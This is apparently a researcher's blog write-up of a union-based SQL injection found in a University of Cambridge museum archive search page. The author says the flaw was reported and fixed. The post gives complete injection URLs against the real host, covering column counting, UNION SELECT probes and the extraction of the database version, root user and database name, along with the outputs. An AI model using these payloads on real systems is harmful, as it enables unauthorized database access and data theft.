SQL Injection Vulnerability In University Of Cambridge

Hello

Introduction Of Author:

I am Adesh Nandkishor Kolte ,An Independent Security Resercher From India

Found a SQL Injection Vulnerability in University Of Cambridge

This is the most prevalent and most dangerous of web application vulnerabilities. Having this SQLi vulnerability in the application, an attacker may cause severe damage such as bypassing logins, retrieving sensitive information, modifying, deleting data. Sometimes this costs life when it comes to Healthcare, Banking domains. Okay introduction apart, the objective of this article is to exploit and read some sensitive data from the database. If you don’t know what exactly is this SQLi then read my other article which may throw some light. I am splitting the subject into two parts, having everything in one might throw you out of interest.

Identifying the vulnerable site!

I tried the most basic check for SQL vulnerability by inserting an apostrophe (‘) in the username field and leaving the password field empty and trying to login, after a few attempts this website gave me an SQL error which looked something like this.

Now, lets get started. Launch your Target select SQL injection GET/Search.

Our Target URL :

https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]=named_individuals_sum

Fixing The Error

So I tried Some tricks for fixing this error which occur when i entered the single quote (‘)

Like that

https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]=named_individuals_sum’ — +

https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]=named_individuals_sum’ — -

https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]=’named_individuals_sum’ — +(worked :) Fixed The error )

Finding Columns Using Order By or Group By

Order By Clause in My SQL

The SQL ORDER BY clause is used to sort the data in ascending or descending order, based on one or more columns. Some databases sort the query results in an ascending order by default.

Group By Clause in My SQL

The SQL GROUP BY clause is used in collaboration with the SELECT statement to arrange identical data into groups. This GROUP BY clause follows the WHERE clause in a SELECT statement and precedes the ORDER BY clause.

For finding the Column here i used order by clause

https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]=’named_individuals_sum’ order by 16 — +

so i tried order by 15 — + here

https://www.hki.fitzmuseum.cam.ac.uk/archives/winsor-and-newton/search.php?pid=Search&s_arg=Boutin&opt[]=’named_individuals_sum’ order by 1 5— +

Site Loaded Normally so this website have 15 columns

Finding Vulnerable Column From 15 Columns

For finding vulnerable Column i have to use the keyword in MYSQL

UNION SELECT

What is the use of Union Clause in My SQL?

The SQL UNION clause/operator is used to combine the results of two or more SELECT statements without returning any duplicate rows

What is SELECT Statement ?

The SQL SELECT statement is used to fetch the data from a database table which returns this data in the form of a result table. These result tables are called result-sets.

— — — — — —

Syntax

The basic syntax of the UNION SELECT statement is as follows

UNION SELECT column1, column2, columnN FROM table_name;

http://webapps.fitzmuseum.cam.ac.uk/wn/search.php?pid=Search&s_arg=Boutin&opt[]=’named_individuals_sum’ union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+

Getting Required Data

Finding Version, User and Database name SQL provide function for that

For example version(),User() and database()

Version()

http://webapps.fitzmuseum.cam.ac.uk/wn/search.php?pid=Search&s_arg=Boutin&opt[]=%27named_individuals_sum%27%20union%20select%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15--+

Output:

5.1.39-community

User()

http://webapps.fitzmuseum.cam.ac.uk/wn/search.php?pid=Search&s_arg=Boutin&opt[]=%27named_individuals_sum%27%20union%20select%201,user(),3,4,5,6,7,8,9,10,11,12,13,14,15--+

output:

root@koala.fitzmuseum.cam.ac.uk

Database()

http://webapps.fitzmuseum.cam.ac.uk/wn/search.php?pid=Search&s_arg=Boutin&opt[]=%27named_individuals_sum%27%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12,13,14,15--+

Output:

wn_index

Video Demonstration:

https://youtu.be/tK88xAwuF2w

I reported last week and vulnerability Fixed :)

I hope you like the Article

Thanks for Reading and Happy Hunting :)